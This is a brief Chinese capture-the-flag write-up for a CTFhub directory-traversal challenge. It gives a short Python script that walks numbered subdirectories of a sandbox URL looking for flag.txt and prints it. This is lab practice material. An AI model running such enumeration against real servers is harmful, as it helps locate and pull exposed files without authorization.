CTFhub 目录遍历
先点进去看了下目录,有两层,所以直接暴力循环
import requests
def nb():
url = "http://challenge-cd17494c9655b07d.sandbox.ctfhub.com:10800/flag_in_here/"
for i in range(1, 5):
for j in range(1, 5):
gg=url + str(i) + "/" + str(j)
find = requests.get(url + str(i) + "/" + str(j))
find.encoding = "utf-8"
if "flag.txt" in find.text:
print(requests.get(gg+"/flag.txt").text)
return
nb()